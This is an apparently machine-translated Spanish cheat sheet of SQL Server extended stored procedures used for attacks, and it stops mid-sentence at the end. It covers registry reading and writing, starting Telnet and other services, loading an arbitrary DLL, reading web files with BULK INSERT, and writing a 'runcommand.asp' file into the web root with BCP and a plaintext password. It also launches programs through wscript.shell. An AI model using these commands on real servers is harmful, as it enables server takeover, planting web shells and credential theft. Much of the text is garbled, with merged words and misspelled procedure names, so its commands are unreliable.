Algunas extensiones SQL
xp_regaddmultistring
XP_REGDELETEKEY DELETE Nombre de la tecla
XP_REGDELEVALUATE Valor clave
xp_regenumkeys enum
xp_regenumValues
XP_Regread para
xp_regremovemultistring
xp_regwrite escribir
XP_AVAILABLABLEMEDIA VIEW DRIVE
directorio de vista xp_dirrree
XP_ENUMDSNODBC Fuente de datos
XP_LOGINCINFIG Información sobre alguna configuración de seguridad del servidor
Paquete XP_MAKECAB, primero se pueden usar permisos de DBO
XP_NTSEC_ENUMDOMOINS Información relacionada con el nombre de dominio enum
XP_TERMINATE_PROcess Terminal Process e IP
xp_logininfo cuenta de inicio de sesión actualmente
sp_configure recupera contenido en la base de datos (creo que esto es bastante útil)
sp_helpextendedProc obtiene todas las extensiones de almacenamiento
Usuarios de consulta SP_WHO2, el host en el que inician sesión, las operaciones que realizan en la base de datos, etc.
Alguna información de red
EXECXP_REGREADHKEY_LOCAL_MACHINE,
'System/CurrentControlset/Services/LanManserver/Parameters',
'Nullsessionshares'
Escrutinio de la red asistida por SNMP
EXECXP_REGENUMVALUSHKEY_LOCAL_MACHINE,
'System/CurrentControlset/Services/SNMP/Parameters/VnoWComm
Unidades '
Inicie algunos servicios del sistema, como Telnet, y puede llegar a Admin o algunas contraseñas del sistema.
Execmaster..xp_serviceControl'Start ',' programar '
Execmaster..xp_serviceControl'start ',' servidor '
Sp_addextendedProc'xp_webserver ',' c: /temp/xp_foo.dll 'Esta extensión puede ejecutar el programa
Use la sintaxis 'Bulkinsert' para insertar un archivo de texto en una tabla temporal. Simplemente cree esta tabla:
CreateTablefoo (LineVarchar (8000))
Luego realice la operación BulkinSert para insertar los datos en el archivo en la tabla, como:
bulkinsertfoofrom'c: /inetpub/wwwroot/admin/inc.asp '
BCP "SELECT*DETHEXT..FOO" QUERYOUTC: /InetPub/WWWROOT/RUNCOMMAND.ASP-C-SLOCALHOST-USA-PFOOBAR
El parámetro 'S' es el servidor que ejecuta la consulta, el parámetro 'U' es el nombre de usuario, el parámetro 'P' es la contraseña, aquí está 'Foobar'
Se proporcionan varios procedimientos almacenados incorporados en SQLServer que permiten la creación de scripts automáticos ActiveX. Estos scripts son los mismos que los scripts que se ejecutan debajo del intérprete de script de Windows, o programas de secuencias de comandos ASP: usan VBScript o JavaScript para crear e interactuar con ellos. Un script de ejecución automática que usa este método puede hacer cualquier cosa en Transact-SQL en scripts ASP, o en scripts WSH.
Use el objeto 'wscript.shell' para crear una instancia de bloc de notas:
declarar@oint
execsp_oacreate'wscript.shell ',@oout
execsp_oamethod@o, 'run', null, 'ntepad.exe'
Especificar para ejecutarlo después del nombre de usuario: